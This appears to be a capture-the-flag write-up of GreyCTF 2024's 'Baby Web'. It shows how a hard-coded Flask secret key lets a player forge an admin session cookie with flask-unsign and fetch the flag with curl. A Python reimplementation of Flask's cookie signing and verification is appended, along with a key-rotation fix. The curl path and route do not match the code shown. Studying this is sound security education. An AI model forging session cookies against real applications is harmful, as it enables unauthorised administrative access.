Baby Web
Challenge Description
Flask session secret key leaked
Source Code Analysis
```python
import os
from flask import Flask, render_template, session
app = Flask(__name__)
app.secret_key = "baby-web"
FLAG = os.getenv("FLAG", r"grey{fake_flag}")
@app.route("/", methods=["GET"])
def index():
    # Set session if not found
    if "is_admin" not in session:
        session["is_admin"] = False
    return render_template("index.html")
@app.route("/admin")
def admin():
    # Check if the user is admin through cookies
    return render_template("admin.html", flag=FLAG, is_admin=session.get("is_admin"))
#### Some other hidden code ###
if __name__ == "__main__":
    app.run(debug=True)
```
The Flask secret key is hard-coded in the source (`app.secret_key = "baby-web"`). Since Flask only signs the session cookie rather than encrypting it, anyone who knows the key can mint a cookie with `is_admin` set to `True`.
Solution
- Generate token with secret

```shell
┌──(venv3)─(root💀kali)-[~/boxes/nusgreyhat/WEB/Baby Web]
└─$ flask-unsign --sign --secret baby-web --cookie "{'is_admin': True}"
eyJpc19hZG1pbiI6dHJ1ZX0.ZiNXFw.WRsAhM4YuAbaSdsKlkG6EXWZFrU
```

- Get Flag

```shell
┌──(root💀kali)─[~/…/ctf/greyCTF2024/WEB/Fearless Concurrency]
└─$ curl -H "Cookie: session=eyJpc19hZG1pbiI6dHJ1ZX0.ZiNXFw.WRsAhM4YuAbaSdsKlkG6EXWZFrU" http://challs.nusgreyhats.org:33338/flag
Here is your flag: <code>grey{0h_n0_mY_5up3r_53cr3t_4dm1n_fl4g}</code>
```
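To see what the cookie above actually consists of, here is a standard-library re-implementation of Flask's session signing (an added example, not the challenge's or Flask's own code). It assumes Flask's defaults: itsdangerous `URLSafeTimedSerializer`, salt `cookie-session`, HMAC-SHA1 key derivation, and the compact JSON payload encoding. Decoding shows the payload is readable by anyone without the key, and verifying the same cookie against a freshly generated random key rejects it, which is the fix this challenge is built around.

```python
# Added example: Flask session cookie format, stdlib only.
# Assumes Flask defaults (itsdangerous, salt "cookie-session", HMAC-SHA1).
import base64
import hashlib
import hmac
import json
import secrets
import zlib

SALT = b"cookie-session"  # fixed salt Flask passes to itsdangerous


def b64(data: bytes) -> str:
    """URL-safe base64 without '=' padding, as itsdangerous emits it."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def derive_key(secret: str) -> bytes:
    # key_derivation="hmac": HMAC-SHA1(secret, salt) becomes the signing key
    return hmac.new(secret.encode(), SALT, hashlib.sha1).digest()


def sign_session(secret: str, data: dict, timestamp: int) -> str:
    """Build payload.timestamp.signature exactly like Flask does."""
    payload = b64(json.dumps(data, separators=(",", ":")).encode())
    ts = b64(timestamp.to_bytes((timestamp.bit_length() + 7) // 8, "big"))
    body = f"{payload}.{ts}"
    sig = hmac.new(derive_key(secret), body.encode(), hashlib.sha1).digest()
    return f"{body}.{b64(sig)}"


def verify_session(secret: str, cookie: str) -> bool:
    """Server-side check: recompute the MAC and compare in constant time."""
    body, _, sig = cookie.rpartition(".")
    expected = hmac.new(derive_key(secret), body.encode(), hashlib.sha1).digest()
    return hmac.compare_digest(expected, unb64(sig))


def decode_payload(cookie: str) -> dict:
    """The payload is only base64 (optionally zlib, marked by a leading '.'),
    so its contents are visible without knowing the secret key."""
    body = cookie.rpartition(".")[0]
    payload, _, ts = body.rpartition(".")
    raw = unb64(payload.lstrip("."))
    if payload.startswith("."):
        raw = zlib.decompress(raw)
    return {"data": json.loads(raw), "issued": int.from_bytes(unb64(ts), "big")}


def rotated_key_rejects(cookie: str) -> bool:
    # Mitigation: a random, non-public key invalidates cookies minted under "baby-web"
    return not verify_session(secrets.token_hex(32), cookie)
```

`decode_payload` on the cookie from the writeup returns `{"is_admin": True}`; `verify_session("baby-web", ...)` accepts it, while `rotated_key_rejects` shows a properly generated key does not.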
This post is licensed under CC BY 4.0 by the author.
